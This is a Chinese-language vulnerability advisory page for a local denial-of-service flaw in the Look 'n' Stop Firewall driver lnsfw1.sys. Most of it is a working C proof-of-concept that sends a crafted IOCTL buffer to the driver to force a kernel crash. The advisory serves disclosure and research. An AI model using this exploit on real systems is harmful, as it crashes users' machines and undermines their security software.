安全研究
安全漏洞
Look 'n' Stop Firewall "lnsfw1.sys"驱动程序IOCTL本地拒绝服务漏洞
发布日期:2011-01-21
更新日期:2011-01-24
受影响系统:
Look 'n' Stop Firewall Look 'n' Stop Firewall 2.07描述:
Look 'n' Stop Firewall Look 'n' Stop Firewall 2.06
BUGTRAQ ID: 45949
Look "n" Stop Firewall 是源于法国的一款防火墙程序。
Look "n" Stop Firewall的"lnsfw1.sys"驱动实现上存在安全漏洞,本地攻击者可利用此漏洞使受影响的应用程序停止响应。
<*来源:Heurs (heurs@ghostsinthstack.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>
/*
Program : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage : http://www.looknstop.com
Discovery : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by : Heurs
This Advisory : Heurs
Contact : s.leberre@sysdream.com
//----- Application description
Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.
//----- Description of vulnerability
lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.
//----- Credits
http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org
s.leberre at sysdream dot com
heurs at ghostsinthestack dot org
*/
int __cdecl main(int argc, char* argv[])
{
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD Crashing[] = {
0x200ff822, 0xd24b37a1, 0x8ce055dc, 0x70b3d269,
0x3d2ef498, 0xcdd0e57c, 0xf2699fab, 0xed753dcb,
0xfdde2a99, 0x90590b61, 0x28011112, 0xeb35191c,
0x36f0e1e7, 0xef7ee764, 0x09b01e1f, 0x0bb86825,
0x1b886612, 0xd8c289df, 0xaa21ad45, 0x6fa7a76d,
0x13492a54, 0x7c2bc443, 0x65dbf582, 0xffeb86cc,
0xf48ca4fd, 0x75542bb5, 0xd05638ba, 0x3876e368,
0x678ba399, 0x6779f15c, 0x8f89ff55, 0xc8b9cf02,
0x033b9857, 0x82eef1a9, 0xf0dba3b6, 0xadf5b8f6,
0x033ef961, 0x393f043b, 0x515896fd, 0x28d10e25,
0x37b7f707, 0x1a425f92, 0x4bc6acfb, 0x45390605,
0x0be40107, 0xf121a706, 0x4b4c0e31, 0x88889f12,
0x0c60806d, 0x03af4569, 0xe5b68798, 0xb22bd966,
0xd532fe7f, 0x19a7213a, 0x6927f7f5, 0xcd4c3202,
0x96831f6b, 0x1d09991d, 0x48d1da67, 0x68f24415,
0xbb01a216, 0xdb6b634a, 0x18e36cb4, 0xcd7265c2,
0x64b81111, 0x4305d1b3, 0xc4f1ee8d, 0xfcd61343,
0xb8bfc8b9, 0x8a1a5541, 0xe9c3adcb, 0xca4c2a56,
0x89a67e7d, 0x74b8704e, 0xfe70e4d6, 0x27612082,
0xd8e211d7, 0x190ec39c, 0x380dfc09, 0x8d649b0c,
0xeda15e23, 0xe2e76319, 0xc781f249, 0x4cb25434,
0xeff3dc6a, 0xa0a6e976, 0x57014474, 0x98629b36,
0x2cc9fb9d, 0xa6a8b31b, 0xa3fbef44, 0xfeb130d3,
0x91e8c96b, 0xdc953762, 0x77341f7c, 0xd4ec9d26,
0x8504a663, 0x1da0406a, 0x8a049adf, 0x0f2ca8ef,
0xbc93ec1e, 0x027bdfad, 0x4c8885f6, 0x1c30be98,
0x0ec01493, 0x124d4252, 0x0765f8c1, 0x801652da,
0x778a6e6a, 0x09ef17aa, 0x6ece13fd, 0xa7280f9c,
0xcf6235f9, 0xabdeae81, 0x8145979e, 0x45af7871,
0xed3d36e0, 0x9e223b88, 0xfe26e7f2, 0xe13743f1,
0xa8171a6e, 0x611c303f, 0x252a68d2, 0xd013e026,
0x1259b868, 0xf673c420, 0x27a60840, 0xd87eed92,
0xef872203, 0x26868592, 0x18324bc9, 0xed47e068,
0xf2c0b162, 0x95966d8e, 0x07cc53db, 0xe8360489,
0x7c630b42, 0x8ab52dd9, 0xc5bf0c0e, 0xae8a8284,
0x97a0a5ab, 0x0cccb1c4, 0x4d768275, 0x1101e67e,
0x16e2f2c3, 0x82b7686a, 0x5b26314e, 0x52f74f38,
0xcb341107, 0xa59c70d0, 0x3327af19, 0xdd51188f,
0x54636221, 0xa05f288a, 0xeb7d4a3a, 0x2065885d,
0xb103190e, 0xd36e7e1e, 0xf7a7d560, 0xc62c828d,
0x9fc687e9, 0xcf609352, 00e96253
};
BYTE Out[0x20];
printf("0day Local DoS - Look 'n' Stop 2.06p4\n\n");
hDevice = CreateFile("\\\\.\\LNSFW1",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
printf("%x\n",hDevice);
DeviceIoControl(hDevice,0x80000064,Crashing,0x28b,0,0,&NombreByte,NULL);
printf("Sploit Send.\n\n");
CloseHandle(hDevice);
getch();
return 0;
}
建议:
厂商补丁:
Look 'n' Stop Firewall
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.looknstop.com/En/index2.htm
浏览次数:3722
严重程度:0(网友投票)
绿盟科技给您安全的保障